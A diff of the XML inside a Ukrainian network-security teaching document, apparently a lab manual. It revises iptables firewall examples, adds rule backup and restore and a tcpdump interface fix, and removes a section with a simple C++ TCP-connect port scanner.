+              <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘│</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Правило 1 робить брандмауер stateful: без нього комп'ютер не       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  отримав би навіть відповіді DNS-сервера на власний запит           │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└─────────────────────────────────────────────────────────────────────┘</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1737,7 +1818,7 @@
     </w:tbl>
     <w:bookmarkEnd w:id="13"/>
     <w:bookmarkEnd w:id="14"/>
-    <w:bookmarkStart w:id="27" w:name="приклад-виконання"/>
+    <w:bookmarkStart w:id="28" w:name="приклад-виконання"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -2002,16 +2083,25 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
+              <w:t xml:space="preserve"># Захоплення HTTP-трафіку (any — усі інтерфейси: у сучасних</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># дистрибутивах мережева карта зветься не eth0, а, наприклад, enp0s3)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo tcpdump -i any port 80 -A | head -50</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2619,7 +2709,7 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
+              <w:t xml:space="preserve"># Перегляд поточних правил і резервна копія</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2636,14 +2726,89 @@
               <w:pStyle w:val="SourceCode"/>
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables-save | sudo tee /root/iptables.backup &gt; /dev/null</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Спершу — те, без чого машина втратить мережу:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># локальний інтерфейс і відповіді на з'єднання, які ми відкрили самі</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -i lo -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Якщо працюєте у ВМ через SSH — дозволити його ДО заборони</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Дозволити вхідні на порти 80 і 443</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2660,21 +2825,6 @@
               <w:pStyle w:val="SourceCode"/>
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
             <w:r>
               <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
             </w:r>
@@ -2739,16 +2889,16 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve"># Зберегти правила</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
+              <w:t xml:space="preserve"># Відновити початковий стан після роботи</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo iptables-restore &lt; /root/iptables.backup</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2762,6 +2912,95 @@
           <w:szCs w:val="4"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Два підводні камені. Перенаправлення</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo iptables-save &gt; /etc/файл</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">не спрацює:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">виконує ваша оболонка без прав root, тому тут використано</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tee</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. І в Ubuntu, Debian та Fedora команда</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">iptables</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">насправді працює поверх nftables, а для простих правил зручніша обгортка</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ufw</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo ufw deny 23/tcp</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">).</w:t>
+      </w:r>
     </w:p>
     <w:bookmarkEnd w:id="20"/>
     <w:bookmarkEnd w:id="21"/>
@@ -2969,24 +3208,6 @@
               <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve"># Linux</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
-            </w:r>
-          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
@@ -2998,16 +3219,6 @@
           <w:szCs w:val="4"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:bookmarkEnd w:id="22"/>
-    <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading4"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Базове сканування портів</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3054,892 +3265,16 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// у властивостях додати бібліотеку ws2_32.lib</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// (Linker → Input → Additional Dependencies).</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#include &lt;vector&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #include &lt;winsock2.h&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #include &lt;ws2tcpip.h&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #pragma comment(lib, "ws2_32.lib")</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  using socket_t = SOCKET;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = INVALID_SOCKET;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#else</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #include &lt;sys/socket.h&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #include &lt;arpa/inet.h&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #include &lt;unistd.h&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  using socket_t = int;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  const socket_t INVALID_SOCK = -1;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">  #define closesocket close</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#endif</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">struct ServiceName {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    int port;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    const char* name;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">};</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">const ServiceName KNOWN_SERVICES[] = {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    {21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    {53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    {443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    {5432, "PostgreSQL"}, {8080, "HTTP-alt"}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">};</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">const char* serviceName(int port) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    for (const ServiceName&amp; service : KNOWN_SERVICES) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">        if (service.port == port) return service.name;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    return "Unknown";</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">// Спроба встановити з'єднання: успіх означає, що порт відкритий</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">bool isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    socket_t sock = socket(AF_INET, SOCK_STREAM, 0);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    if (sock == INVALID_SOCK) return false;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    // Обмежуємо час очікування, інакше сканування триватиме надто довго</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#ifdef _WIN32</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">               reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#else</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000 };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">#endif</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
